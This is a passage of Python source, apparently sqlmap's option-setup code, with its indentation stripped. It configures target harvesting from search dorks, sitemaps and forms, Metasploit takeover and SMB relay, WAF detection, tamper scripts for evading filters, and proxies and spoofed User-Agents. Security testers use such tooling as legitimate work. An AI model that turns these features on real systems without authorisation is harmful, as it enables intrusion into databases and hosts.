kb.data.onlyGETs = readInput(message, default='Y', boolean=True)
if not kb.data.onlyGETs or conf.googleDork:
kb.targets.add((link, conf.method, conf.data, conf.cookie, None))
return links
while True:
links = retrieve()
if kb.targets:
infoMsg = "sqlmap got %d results for your " % len(links)
infoMsg += "search dork expression, "
if len(links) == len(kb.targets):
infoMsg += "all "
else:
infoMsg += "%d " % len(kb.targets)
infoMsg += "of them are testable targets"
logger.info(infoMsg)
break
else:
message = "sqlmap got %d results " % len(links)
message += "for your search dork expression, but none of them "
message += "have GET parameters to test for SQL injection. "
message += "Do you want to skip to the next result page? [Y/n]"
if not readInput(message, default='Y', boolean=True):
raise SqlmapSilentQuitException
else:
conf.googlePage += 1
def _setBulkMultipleTargets():
if not conf.bulkFile:
return
conf.bulkFile = safeExpandUser(conf.bulkFile)
infoMsg = "parsing multiple targets list from '%s'" % conf.bulkFile
logger.info(infoMsg)
if not os.path.isfile(conf.bulkFile):
errMsg = "the specified bulk file "
errMsg += "does not exist"
raise SqlmapFilePathException(errMsg)
found = False
for line in getFileItems(conf.bulkFile):
if re.match(r"[^ ]+\?(.+)", line, re.I) or kb.customInjectionMark in line:
found = True
kb.targets.add((line.strip(), conf.method, conf.data, conf.cookie, None))
if not found and not conf.forms and not conf.crawlDepth:
warnMsg = "no usable links found (with GET parameters)"
logger.warn(warnMsg)
def _setSitemapTargets():
if not conf.sitemapUrl:
return
infoMsg = "parsing sitemap '%s'" % conf.sitemapUrl
logger.info(infoMsg)
found = False
for item in parseSitemap(conf.sitemapUrl):
if re.match(r"[^ ]+\?(.+)", item, re.I):
found = True
kb.targets.add((item.strip(), None, None, None, None))
if not found and not conf.forms and not conf.crawlDepth:
warnMsg = "no usable links found (with GET parameters)"
logger.warn(warnMsg)
def _findPageForms():
if not conf.forms or conf.crawlDepth:
return
if conf.url and not checkConnection():
return
infoMsg = "searching for forms"
logger.info(infoMsg)
if not any((conf.bulkFile, conf.googleDork, conf.sitemapUrl)):
page, _, _ = Request.queryPage(content=True)
findPageForms(page, conf.url, True, True)
else:
if conf.bulkFile:
targets = getFileItems(conf.bulkFile)
elif conf.sitemapUrl:
targets = parseSitemap(conf.sitemapUrl)
elif conf.googleDork:
targets = [_[0] for _ in kb.targets]
kb.targets.clear()
for i in xrange(len(targets)):
try:
target = targets[i]
page, _, _ = Request.getPage(url=target.strip(), crawling=True, raise404=False)
findPageForms(page, target, False, True)
if conf.verbose in (1, 2):
status = '%d/%d links visited (%d%%)' % (i + 1, len(targets), round(100.0 * (i + 1) / len(targets)))
dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status), True)
except KeyboardInterrupt:
break
except Exception as ex:
errMsg = "problem occurred while searching for forms at '%s' ('%s')" % (target, getSafeExString(ex))
logger.error(errMsg)
def _setDBMSAuthentication():
"""
Check and set the DBMS authentication credentials to run statements as
another user, not the session user
"""
if not conf.dbmsCred:
return
debugMsg = "setting the DBMS authentication credentials"
logger.debug(debugMsg)
match = re.search(r"^(.+?):(.*?)$", conf.dbmsCred)
if not match:
errMsg = "DBMS authentication credentials value must be in format "
errMsg += "username:password"
raise SqlmapSyntaxException(errMsg)
conf.dbmsUsername = match.group(1)
conf.dbmsPassword = match.group(2)
def _setMetasploit():
if not conf.osPwn and not conf.osSmb and not conf.osBof:
return
debugMsg = "setting the takeover out-of-band functionality"
logger.debug(debugMsg)
msfEnvPathExists = False
if IS_WIN:
try:
__import__("win32file")
except ImportError:
errMsg = "sqlmap requires third-party module 'pywin32' "
errMsg += "in order to use Metasploit functionalities on "
errMsg += "Windows. You can download it from "
errMsg += "'https://sourceforge.net/projects/pywin32/files/pywin32/'"
raise SqlmapMissingDependence(errMsg)
if not conf.msfPath:
def _(key, value):
retVal = None
try:
from _winreg import ConnectRegistry, OpenKey, QueryValueEx, HKEY_LOCAL_MACHINE
_ = ConnectRegistry(None, HKEY_LOCAL_MACHINE)
_ = OpenKey(_, key)
retVal = QueryValueEx(_, value)[0]
except:
logger.debug("unable to identify Metasploit installation path via registry key")
return retVal
conf.msfPath = _(r"SOFTWARE\Rapid7\Metasploit", "Location")
if conf.msfPath:
conf.msfPath = os.path.join(conf.msfPath, "msf3")
if conf.osSmb:
isAdmin = runningAsAdmin()
if not isAdmin:
errMsg = "you need to run sqlmap as an administrator "
errMsg += "if you want to perform a SMB relay attack because "
errMsg += "it will need to listen on a user-specified SMB "
errMsg += "TCP port for incoming connection attempts"
raise SqlmapMissingPrivileges(errMsg)
if conf.msfPath:
for path in (conf.msfPath, os.path.join(conf.msfPath, "bin")):
if any(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("msfcli", "msfconsole")):
msfEnvPathExists = True
if all(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("msfvenom",)):
kb.oldMsf = False
elif all(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("msfencode", "msfpayload")):
kb.oldMsf = True
else:
msfEnvPathExists = False
conf.msfPath = path
break
if msfEnvPathExists:
debugMsg = "provided Metasploit Framework path "
debugMsg += "'%s' is valid" % conf.msfPath
logger.debug(debugMsg)
else:
warnMsg = "the provided Metasploit Framework path "
warnMsg += "'%s' is not valid. The cause could " % conf.msfPath
warnMsg += "be that the path does not exists or that one "
warnMsg += "or more of the needed Metasploit executables "
warnMsg += "within msfcli, msfconsole, msfencode and "
warnMsg += "msfpayload do not exist"
logger.warn(warnMsg)
else:
warnMsg = "you did not provide the local path where Metasploit "
warnMsg += "Framework is installed"
logger.warn(warnMsg)
if not msfEnvPathExists:
warnMsg = "sqlmap is going to look for Metasploit Framework "
warnMsg += "installation inside the environment path(s)"
logger.warn(warnMsg)
envPaths = os.environ.get("PATH", "").split(";" if IS_WIN else ":")
for envPath in envPaths:
envPath = envPath.replace(";", "")
if any(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfcli", "msfconsole")):
msfEnvPathExists = True
if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfvenom",)):
kb.oldMsf = False
elif all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfencode", "msfpayload")):
kb.oldMsf = True
else:
msfEnvPathExists = False
if msfEnvPathExists:
infoMsg = "Metasploit Framework has been found "
infoMsg += "installed in the '%s' path" % envPath
logger.info(infoMsg)
conf.msfPath = envPath
break
if not msfEnvPathExists:
errMsg = "unable to locate Metasploit Framework installation. "
errMsg += "You can get it at 'https://www.metasploit.com/download/'"
raise SqlmapFilePathException(errMsg)
def _setWriteFile():
if not conf.fileWrite:
return
debugMsg = "setting the write file functionality"
logger.debug(debugMsg)
if not os.path.exists(conf.fileWrite):
errMsg = "the provided local file '%s' does not exist" % conf.fileWrite
raise SqlmapFilePathException(errMsg)
if not conf.fileDest:
errMsg = "you did not provide the back-end DBMS absolute path "
errMsg += "where you want to write the local file '%s'" % conf.fileWrite
raise SqlmapMissingMandatoryOptionException(errMsg)
conf.fileWriteType = getFileType(conf.fileWrite)
def _setOS():
"""
Force the back-end DBMS operating system option.
"""
if not conf.os:
return
if conf.os.lower() not in SUPPORTED_OS:
errMsg = "you provided an unsupported back-end DBMS operating "
errMsg += "system. The supported DBMS operating systems for OS "
errMsg += "and file system access are %s. " % ', '.join([o.capitalize() for o in SUPPORTED_OS])
errMsg += "If you do not know the back-end DBMS underlying OS, "
errMsg += "do not provide it and sqlmap will fingerprint it for "
errMsg += "you."
raise SqlmapUnsupportedDBMSException(errMsg)
debugMsg = "forcing back-end DBMS operating system to user defined "
debugMsg += "value '%s'" % conf.os
logger.debug(debugMsg)
Backend.setOs(conf.os)
def _setTechnique():
validTechniques = sorted(getPublicTypeMembers(PAYLOAD.TECHNIQUE), key=lambda x: x[1])
validLetters = [_[0][0].upper() for _ in validTechniques]
if conf.tech and isinstance(conf.tech, basestring):
_ = []
for letter in conf.tech.upper():
if letter not in validLetters:
errMsg = "value for --technique must be a string composed "
errMsg += "by the letters %s. Refer to the " % ", ".join(validLetters)
errMsg += "user's manual for details"
raise SqlmapSyntaxException(errMsg)
for validTech, validInt in validTechniques:
if letter == validTech[0]:
_.append(validInt)
break
conf.tech = _
def _setDBMS():
"""
Force the back-end DBMS option.
"""
if not conf.dbms:
return
debugMsg = "forcing back-end DBMS to user defined value"
logger.debug(debugMsg)
conf.dbms = conf.dbms.lower()
regex = re.search(r"%s ([\d\.]+)" % ("(%s)" % "|".join([alias for alias in SUPPORTED_DBMS])), conf.dbms, re.I)
if regex:
conf.dbms = regex.group(1)
Backend.setVersion(regex.group(2))
if conf.dbms not in SUPPORTED_DBMS:
errMsg = "you provided an unsupported back-end database management "
errMsg += "system. Supported DBMSes are as follows: %s. " % ', '.join(sorted(_ for _ in DBMS_DICT))
errMsg += "If you do not know the back-end DBMS, do not provide "
errMsg += "it and sqlmap will fingerprint it for you."
raise SqlmapUnsupportedDBMSException(errMsg)
for dbms, aliases in DBMS_ALIASES:
if conf.dbms in aliases:
conf.dbms = dbms
break
def _listTamperingFunctions():
"""
Lists available tamper functions
"""
if conf.listTampers:
infoMsg = "listing available tamper scripts\n"
logger.info(infoMsg)
for script in sorted(glob.glob(os.path.join(paths.SQLMAP_TAMPER_PATH, "*.py"))):
content = openFile(script, "rb").read()
match = re.search(r'(?s)__priority__.+"""(.+)"""', content)
if match:
comment = match.group(1).strip()
dataToStdout("* %s - %s\n" % (setColor(os.path.basename(script), "yellow"), re.sub(r" *\n *", " ", comment.split("\n\n")[0].strip())))
def _setTamperingFunctions():
"""
Loads tampering functions from given script(s)
"""
if conf.tamper:
last_priority = PRIORITY.HIGHEST
check_priority = True
resolve_priorities = False
priorities = []
for script in re.split(PARAMETER_SPLITTING_REGEX, conf.tamper):
found = False
path = paths.SQLMAP_TAMPER_PATH.encode(sys.getfilesystemencoding() or UNICODE_ENCODING)
script = script.strip().encode(sys.getfilesystemencoding() or UNICODE_ENCODING)
try:
if not script:
continue
elif os.path.exists(os.path.join(path, script if script.endswith(".py") else "%s.py" % script)):
script = os.path.join(path, script if script.endswith(".py") else "%s.py" % script)
elif not os.path.exists(script):
errMsg = "tamper script '%s' does not exist" % script
raise SqlmapFilePathException(errMsg)
elif not script.endswith(".py"):
errMsg = "tamper script '%s' should have an extension '.py'" % script
raise SqlmapSyntaxException(errMsg)
except UnicodeDecodeError:
errMsg = "invalid character provided in option '--tamper'"
raise SqlmapSyntaxException(errMsg)
dirname, filename = os.path.split(script)
dirname = os.path.abspath(dirname)
infoMsg = "loading tamper module '%s'" % filename[:-3]
logger.info(infoMsg)
if not os.path.exists(os.path.join(dirname, "__init__.py")):
errMsg = "make sure that there is an empty file '__init__.py' "
errMsg += "inside of tamper scripts directory '%s'" % dirname
raise SqlmapGenericException(errMsg)
if dirname not in sys.path:
sys.path.insert(0, dirname)
try:
module = __import__(filename[:-3].encode(sys.getfilesystemencoding() or UNICODE_ENCODING))
except Exception as ex:
raise SqlmapSyntaxException("cannot import tamper module '%s' (%s)" % (filename[:-3], getSafeExString(ex)))
priority = PRIORITY.NORMAL if not hasattr(module, "__priority__") else module.__priority__
for name, function in inspect.getmembers(module, inspect.isfunction):
if name == "tamper" and inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs":
found = True
kb.tamperFunctions.append(function)
function.func_name = module.__name__
if check_priority and priority > last_priority:
message = "it appears that you might have mixed "
message += "the order of tamper scripts. "
message += "Do you want to auto resolve this? [Y/n/q] "
choice = readInput(message, default='Y').upper()
if choice == 'N':
resolve_priorities = False
elif choice == 'Q':
raise SqlmapUserQuitException
else:
resolve_priorities = True
check_priority = False
priorities.append((priority, function))
last_priority = priority
break
elif name == "dependencies":
try:
function()
except Exception as ex:
errMsg = "error occurred while checking dependencies "
errMsg += "for tamper module '%s' ('%s')" % (filename[:-3], getSafeExString(ex))
raise SqlmapGenericException(errMsg)
if not found:
errMsg = "missing function 'tamper(payload, **kwargs)' "
errMsg += "in tamper script '%s'" % script
raise SqlmapGenericException(errMsg)
if kb.tamperFunctions and len(kb.tamperFunctions) > 3:
warnMsg = "using too many tamper scripts is usually not "
warnMsg += "a good idea"
logger.warning(warnMsg)
if resolve_priorities and priorities:
priorities.sort(reverse=True)
kb.tamperFunctions = []
for _, function in priorities:
kb.tamperFunctions.append(function)
def _setWafFunctions():
"""
Loads WAF/IPS detecting functions from script(s)
"""
if conf.identifyWaf:
for found in glob.glob(os.path.join(paths.SQLMAP_WAF_PATH, "*.py")):
dirname, filename = os.path.split(found)
dirname = os.path.abspath(dirname)
if filename == "__init__.py":
continue
debugMsg = "loading WAF script '%s'" % filename[:-3]
logger.debug(debugMsg)
if dirname not in sys.path:
sys.path.insert(0, dirname)
try:
if filename[:-3] in sys.modules:
del sys.modules[filename[:-3]]
module = __import__(filename[:-3].encode(sys.getfilesystemencoding() or UNICODE_ENCODING))
except ImportError as ex:
raise SqlmapSyntaxException("cannot import WAF script '%s' (%s)" % (filename[:-3], getSafeExString(ex)))
_ = dict(inspect.getmembers(module))
if "detect" not in _:
errMsg = "missing function 'detect(get_page)' "
errMsg += "in WAF script '%s'" % found
raise SqlmapGenericException(errMsg)
else:
kb.wafFunctions.append((_["detect"], _.get("__product__", filename[:-3])))
kb.wafFunctions = sorted(kb.wafFunctions, key=lambda _: "generic" in _[1].lower())
def _setThreads():
if not isinstance(conf.threads, int) or conf.threads <= 0:
conf.threads = 1
def _setDNSCache():
"""
Makes a cached version of socket._getaddrinfo to avoid subsequent DNS requests.
"""
def _getaddrinfo(*args, **kwargs):
if args in kb.cache.addrinfo:
return kb.cache.addrinfo[args]
else:
kb.cache.addrinfo[args] = socket._getaddrinfo(*args, **kwargs)
return kb.cache.addrinfo[args]
if not hasattr(socket, "_getaddrinfo"):
socket._getaddrinfo = socket.getaddrinfo
socket.getaddrinfo = _getaddrinfo
def _setSocketPreConnect():
"""
Makes a pre-connect version of socket.connect
"""
if conf.disablePrecon:
return
def _thread():
while kb.get("threadContinue") and not conf.get("disablePrecon"):
try:
for key in socket._ready:
if len(socket._ready[key]) < SOCKET_PRE_CONNECT_QUEUE_SIZE:
family, type, proto, address = key
s = socket.socket(family, type, proto)
s._connect(address)
try:
if type == socket.SOCK_STREAM:
# Reference: https://www.techrepublic.com/article/tcp-ip-options-for-high-performance-data-transmission/
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
except:
pass
with kb.locks.socket:
socket._ready[key].append((s._sock, time.time()))
except KeyboardInterrupt:
break
except:
pass
finally:
time.sleep(0.01)
def connect(self, address):
found = False
key = (self.family, self.type, self.proto, address)
with kb.locks.socket:
if key not in socket._ready:
socket._ready[key] = []
while len(socket._ready[key]) > 0:
candidate, created = socket._ready[key].pop(0)
if (time.time() - created) < PRECONNECT_CANDIDATE_TIMEOUT:
self._sock = candidate
found = True
break
else:
try:
candidate.shutdown(socket.SHUT_RDWR)
candidate.close()
except socket.error:
pass
if not found:
self._connect(address)
if not hasattr(socket.socket, "_connect"):
socket._ready = {}
socket.socket._connect = socket.socket.connect
socket.socket.connect = connect
thread = threading.Thread(target=_thread)
setDaemon(thread)
thread.start()
def _setHTTPHandlers():
"""
Check and set the HTTP/SOCKS proxy for all HTTP requests.
"""
global proxyHandler
for _ in ("http", "https"):
if hasattr(proxyHandler, "%s_open" % _):
delattr(proxyHandler, "%s_open" % _)
if conf.proxyList is not None:
if not conf.proxyList:
errMsg = "list of usable proxies is exhausted"
raise SqlmapNoneDataException(errMsg)
conf.proxy = conf.proxyList[0]
conf.proxyList = conf.proxyList[1:]
infoMsg = "loading proxy '%s' from a supplied proxy list file" % conf.proxy
logger.info(infoMsg)
elif not conf.proxy:
if conf.hostname in ("localhost", "127.0.0.1") or conf.ignoreProxy:
proxyHandler.proxies = {}
if conf.proxy:
debugMsg = "setting the HTTP/SOCKS proxy for all HTTP requests"
logger.debug(debugMsg)
try:
_ = urlparse.urlsplit(conf.proxy)
except Exception as ex:
errMsg = "invalid proxy address '%s' ('%s')" % (conf.proxy, getSafeExString(ex))
raise SqlmapSyntaxException(errMsg)
hostnamePort = _.netloc.split(":")
scheme = _.scheme.upper()
hostname = hostnamePort[0]
port = None
username = None
password = None
if len(hostnamePort) == 2:
try:
port = int(hostnamePort[1])
except:
pass # drops into the next check block
if not all((scheme, hasattr(PROXY_TYPE, scheme), hostname, port)):
errMsg = "proxy value must be in format '(%s)://address:port'" % "|".join(_[0].lower() for _ in getPublicTypeMembers(PROXY_TYPE))
raise SqlmapSyntaxException(errMsg)
if conf.proxyCred:
_ = re.search(r"\A(.*?):(.*?)\Z", conf.proxyCred)
if not _:
errMsg = "proxy authentication credentials "
errMsg += "value must be in format username:password"
raise SqlmapSyntaxException(errMsg)
else:
username = _.group(1)
password = _.group(2)
if scheme in (PROXY_TYPE.SOCKS4, PROXY_TYPE.SOCKS5):
proxyHandler.proxies = {}
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if scheme == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, hostname, port, username=username, password=password)
socks.wrapmodule(urllib2)
else:
socks.unwrapmodule(urllib2)
if conf.proxyCred:
# Reference: http://stackoverflow.com/questions/34079/how-to-specify-an-authenticated-proxy-for-a-python-http-connection
proxyString = "%s@" % conf.proxyCred
else:
proxyString = ""
proxyString += "%s:%d" % (hostname, port)
proxyHandler.proxies = {"http": proxyString, "https": proxyString}
proxyHandler.__init__(proxyHandler.proxies)
debugMsg = "creating HTTP requests opener object"
logger.debug(debugMsg)
handlers = filter(None, [multipartPostHandler, proxyHandler if proxyHandler.proxies else None, authHandler, redirectHandler, rangeHandler, httpsHandler])
if not conf.dropSetCookie:
if not conf.loadCookies:
conf.cj = cookielib.CookieJar()
else:
conf.cj = cookielib.MozillaCookieJar()
resetCookieJar(conf.cj)
handlers.append(urllib2.HTTPCookieProcessor(conf.cj))
# Reference: http://www.w3.org/Protocols/rfc2616/rfc2616-sec8.html
if conf.keepAlive:
warnMsg = "persistent HTTP(s) connections, Keep-Alive, has "
warnMsg += "been disabled because of its incompatibility "
if conf.proxy:
warnMsg += "with HTTP(s) proxy"
logger.warn(warnMsg)
elif conf.authType:
warnMsg += "with authentication methods"
logger.warn(warnMsg)
else:
handlers.append(keepAliveHandler)
opener = urllib2.build_opener(*handlers)
urllib2.install_opener(opener)
def _setSafeVisit():
"""
Check and set the safe visit options.
"""
if not any((conf.safeUrl, conf.safeReqFile)):
return
if conf.safeReqFile:
checkFile(conf.safeReqFile)
raw = readCachedFileContent(conf.safeReqFile)
match = re.search(r"\A([A-Z]+) ([^ ]+) HTTP/[0-9.]+\Z", raw[:raw.find('\n')])
if match:
kb.safeReq.method = match.group(1)
kb.safeReq.url = match.group(2)
kb.safeReq.headers = {}
for line in raw[raw.find('\n') + 1:].split('\n'):
line = line.strip()
if line and ':' in line:
key, value = line.split(':', 1)
value = value.strip()
kb.safeReq.headers[key] = value
if key.upper() == HTTP_HEADER.HOST.upper():
if not value.startswith("http"):
scheme = "http"
if value.endswith(":443"):
scheme = "https"
value = "%s://%s" % (scheme, value)
kb.safeReq.url = urlparse.urljoin(value, kb.safeReq.url)
else:
break
post = None
if '\r\n\r\n' in raw:
post = raw[raw.find('\r\n\r\n') + 4:]
elif '\n\n' in raw:
post = raw[raw.find('\n\n') + 2:]
if post and post.strip():
kb.safeReq.post = post
else:
kb.safeReq.post = None
else:
errMsg = "invalid format of a safe request file"
raise SqlmapSyntaxException(errMsg)
else:
if not re.search(r"\Ahttp[s]*://", conf.safeUrl):
if ":443/" in conf.safeUrl:
conf.safeUrl = "https://" + conf.safeUrl
else:
conf.safeUrl = "http://" + conf.safeUrl
if conf.safeFreq <= 0:
errMsg = "please provide a valid value (>0) for safe frequency (--safe-freq) while using safe visit features"
raise SqlmapSyntaxException(errMsg)
def _setPrefixSuffix():
if conf.prefix is not None and conf.suffix is not None:
# Create a custom boundary object for user's supplied prefix
# and suffix
boundary = AttribDict()
boundary.level = 1
boundary.clause = [0]
boundary.where = [1, 2, 3]
boundary.prefix = conf.prefix
boundary.suffix = conf.suffix
if " like" in boundary.suffix.lower():
if "'" in boundary.suffix.lower():
boundary.ptype = 3
elif '"' in boundary.suffix.lower():
boundary.ptype = 5
elif "'" in boundary.suffix:
boundary.ptype = 2
elif '"' in boundary.suffix:
boundary.ptype = 4
else:
boundary.ptype = 1
# user who provides --prefix/--suffix does not want other boundaries
# to be tested for
conf.boundaries = [boundary]
def _setAuthCred():
"""
Adds authentication credentials (if any) for current target to the password manager
(used by connection handler)
"""
if kb.passwordMgr and all(_ is not None for _ in (conf.scheme, conf.hostname, conf.port, conf.authUsername, conf.authPassword)):
kb.passwordMgr.add_password(None, "%s://%s:%d" % (conf.scheme, conf.hostname, conf.port), conf.authUsername, conf.authPassword)
def _setHTTPAuthentication():
"""
Check and set the HTTP(s) authentication method (Basic, Digest, NTLM or PKI),
username and password for first three methods, or PEM private key file for
PKI authentication
"""
global authHandler
if not conf.authType and not conf.authCred and not conf.authFile:
return
if conf.authFile and not conf.authType:
conf.authType = AUTH_TYPE.PKI
elif conf.authType and not conf.authCred and not conf.authFile:
errMsg = "you specified the HTTP authentication type, but "
errMsg += "did not provide the credentials"
raise SqlmapSyntaxException(errMsg)
elif not conf.authType and conf.authCred:
errMsg = "you specified the HTTP authentication credentials, "
errMsg += "but did not provide the type"
raise SqlmapSyntaxException(errMsg)
elif (conf.authType or "").lower() not in (AUTH_TYPE.BASIC, AUTH_TYPE.DIGEST, AUTH_TYPE.NTLM, AUTH_TYPE.PKI):
errMsg = "HTTP authentication type value must be "
errMsg += "Basic, Digest, NTLM or PKI"
raise SqlmapSyntaxException(errMsg)
if not conf.authFile:
debugMsg = "setting the HTTP authentication type and credentials"
logger.debug(debugMsg)
authType = conf.authType.lower()
if authType in (AUTH_TYPE.BASIC, AUTH_TYPE.DIGEST):
regExp = "^(.*?):(.*?)$"
errMsg = "HTTP %s authentication credentials " % authType
errMsg += "value must be in format 'username:password'"
elif authType == AUTH_TYPE.NTLM:
regExp = "^(.*\\\\.*):(.*?)$"
errMsg = "HTTP NTLM authentication credentials value must "
errMsg += "be in format 'DOMAIN\\username:password'"
elif authType == AUTH_TYPE.PKI:
errMsg = "HTTP PKI authentication require "
errMsg += "usage of option `--auth-pki`"
raise SqlmapSyntaxException(errMsg)
aCredRegExp = re.search(regExp, conf.authCred)
if not aCredRegExp:
raise SqlmapSyntaxException(errMsg)
conf.authUsername = aCredRegExp.group(1)
conf.authPassword = aCredRegExp.group(2)
kb.passwordMgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
_setAuthCred()
if authType == AUTH_TYPE.BASIC:
authHandler = SmartHTTPBasicAuthHandler(kb.passwordMgr)
elif authType == AUTH_TYPE.DIGEST:
authHandler = urllib2.HTTPDigestAuthHandler(kb.passwordMgr)
elif authType == AUTH_TYPE.NTLM:
try:
from ntlm import HTTPNtlmAuthHandler
except ImportError:
errMsg = "sqlmap requires Python NTLM third-party library "
errMsg += "in order to authenticate via NTLM, "
errMsg += "https://github.com/mullender/python-ntlm"
raise SqlmapMissingDependence(errMsg)
authHandler = HTTPNtlmAuthHandler.HTTPNtlmAuthHandler(kb.passwordMgr)
else:
debugMsg = "setting the HTTP(s) authentication PEM private key"
logger.debug(debugMsg)
_ = safeExpandUser(conf.authFile)
checkFile(_)
authHandler = HTTPSPKIAuthHandler(_)
def _setHTTPExtraHeaders():
if conf.headers:
debugMsg = "setting extra HTTP headers"
logger.debug(debugMsg)
conf.headers = conf.headers.split("\n") if "\n" in conf.headers else conf.headers.split("\\n")
for headerValue in conf.headers:
if not headerValue.strip():
continue
if headerValue.count(':') >= 1:
header, value = (_.lstrip() for _ in headerValue.split(":", 1))
if header and value:
conf.httpHeaders.append((header, value))
else:
errMsg = "invalid header value: %s. Valid header format is 'name:value'" % repr(headerValue).lstrip('u')
raise SqlmapSyntaxException(errMsg)
elif not conf.requestFile and len(conf.httpHeaders or []) < 2:
if conf.encoding:
conf.httpHeaders.append((HTTP_HEADER.ACCEPT_CHARSET, "%s;q=0.7,*;q=0.1" % conf.encoding))
# Invalidating any caching mechanism in between
# Reference: http://stackoverflow.com/a/1383359
conf.httpHeaders.append((HTTP_HEADER.CACHE_CONTROL, "no-cache"))
def _setHTTPUserAgent():
"""
Set the HTTP User-Agent header.
Depending on the user options it can be:
* The default sqlmap string
* A default value read as user option
* A random value read from a list of User-Agent headers from a
file choosed as user option
"""
if conf.mobile:
message = "which smartphone do you want sqlmap to imitate "
message += "through HTTP User-Agent header?\n"
items = sorted(getPublicTypeMembers(MOBILES, True))
for count in xrange(len(items)):
item = items[count]
message += "[%d] %s%s\n" % (count + 1, item[0], " (default)" if item == MOBILES.IPHONE else "")
test = readInput(message.rstrip('\n'), default=items.index(MOBILES.IPHONE) + 1)
try:
item = items[int(test) - 1]
except:
item = MOBILES.IPHONE
conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, item[1]))
elif conf.agent:
debugMsg = "setting the HTTP User-Agent header"
logger.debug(debugMsg)
conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, conf.agent))
elif not conf.randomAgent:
_ = True
for header, _ in conf.httpHeaders:
if header.upper() == HTTP_HEADER.USER_AGENT.upper():
_ = False
break
if _:
conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, DEFAULT_USER_AGENT))
else:
if not kb.userAgents:
debugMsg = "loading random HTTP User-Agent header(s) from "
debugMsg += "file '%s'" % paths.USER_AGENTS
logger.debug(debugMsg)
try:
kb.userAgents = getFileItems(paths.USER_AGENTS)
except IOError:
warnMsg = "unable to read HTTP User-Agent header "
warnMsg += "file '%s'" % paths.USER_AGENTS
logger.warn(warnMsg)
conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, DEFAULT_USER_AGENT))
return
userAgent = random.sample(kb.userAgents or [DEFAULT_USER_AGENT], 1)[0]
infoMsg = "fetched random HTTP User-Agent header value '%s' from " % userAgent
infoMsg += "file '%s'" % paths.USER_AGENTS
logger.info(infoMsg)
conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, userAgent))
def _setHTTPReferer():
"""
Set the HTTP Referer
"""
if conf.referer:
debugMsg = "setting the HTTP Referer header"
logger.debug(debugMsg)
conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.referer))
def _setHTTPHost():
"""
Set the HTTP Host
"""
if conf.host:
debugMsg = "setting the HTTP Host header"
logger.debug(debugMsg)
conf.httpHeaders.append((HTTP_HEADER.HOST, conf.host))
def _setHTTPCookies():
"""
Set the HTTP Cookie header
"""
if conf.cookie:
debugMsg = "setting the HTTP Cookie header"
logger.debug(debugMsg)
conf.httpHeaders.append((HTTP_HEADER.COOKIE, conf.cookie))
def _setHostname():
"""
Set value conf.hostname
"""
if conf.url:
try:
conf.hostname = urlparse.urlsplit(conf.url).netloc.split(':')[0]
except ValueError as ex:
errMsg = "problem occurred while "
errMsg += "parsing an URL '%s' ('%s')" % (conf.url, getSafeExString(ex))
raise SqlmapDataException(errMsg)
def _setHTTPTimeout():
"""
Set the HTTP timeout
"""
if conf.timeout:
debugMsg = "setting the HTTP timeout"
logger.debug(debugMsg)
conf.timeout = float(conf.timeout)
if conf.timeout < 3.0:
warnMsg = "the minimum HTTP timeout is 3 seconds, sqlmap "
warnMsg += "will going to reset it"
logger.warn(warnMsg)
conf.timeout = 3.0
else:
conf.timeout = 30.0
socket.setdefaulttimeout(conf.timeout)
def _checkDependencies():
"""
Checks for missing dependencies.
"""
if conf.dependencies:
checkDependencies()
def _createTemporaryDirectory():
"""
Creates temporary directory for this run.
"""
if conf.tmpDir:
try:
if not os.path.isdir(conf.tmpDir):
os.makedirs(conf.tmpDir)
_ = os.path.join(conf.tmpDir, randomStr())
open(_, "w+b").close()
os.remove(_)
tempfile.tempdir = conf.tmpDir
warnMsg = "using '%s' as the temporary directory" % conf.tmpDir
logger.warn(warnMsg)
except (OSError, IOError) as ex:
errMsg = "there has been a problem while accessing "
errMsg += "temporary directory location(s) ('%s')" % getSafeExString(ex)
raise SqlmapSystemException(errMsg)
else:
try:
if not os.path.isdir(tempfile.gettempdir()):
os.makedirs(tempfile.gettempdir())
except Exception as ex:
warnMsg = "there has been a problem while accessing "
warnMsg += "system's temporary directory location(s) ('%s'). Please " % getSafeExString(ex)
warnMsg += "make sure that there is enough disk space left. If problem persists, "
warnMsg += "try to set environment variable 'TEMP' to a location "
warnMsg += "writeable by the current user"
logger.warn(warnMsg)
if "sqlmap" not in (tempfile.tempdir or "") or conf.tmpDir and tempfile.tempdir == conf.tmpDir:
try:
tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid()))
except:
tempfile.tempdir = os.path.join(paths.SQLMAP_HOME_PATH, "tmp", "sqlmap%s%d" % (randomStr(6), os.getpid()))
kb.tempDir = tempfile.tempdir
if not os.path.isdir(tempfile.tempdir):
try:
os.makedirs(tempfile.tempdir)
except Exception as ex:
errMsg = "there has been a problem while setting "
errMsg += "temporary directory location ('%s')" % getSafeExString(ex)
raise SqlmapSystemException(errMsg)
def _cleanupOptions():
"""
Cleanup configuration attributes.
"""
debugMsg = "cleaning up configuration parameters"
logger.debug(debugMsg)
width = getConsoleWidth()
if conf.eta:
conf.progressWidth = width - 26
else:
conf.progressWidth = width - 46
for key, value in conf.items():
if value and any(key.endswith(_) for _ in ("Path", "File", "Dir")):
conf[key] = safeExpandUser(value)
if conf.testParameter:
conf.testParameter = urldecode(conf.testParameter)
conf.testParameter = conf.testParameter.replace(" ", "")
conf.testParameter = re.split(PARAMETER_SPLITTING_REGEX, conf.testParameter)
else:
conf.testParameter = []
if conf.agent:
conf.agent = re.sub(r"[\r\n]", "", conf.agent)
if conf.user:
conf.user = conf.user.replace(" ", "")
if conf.rParam:
conf.rParam = conf.rParam.replace(" ", "")
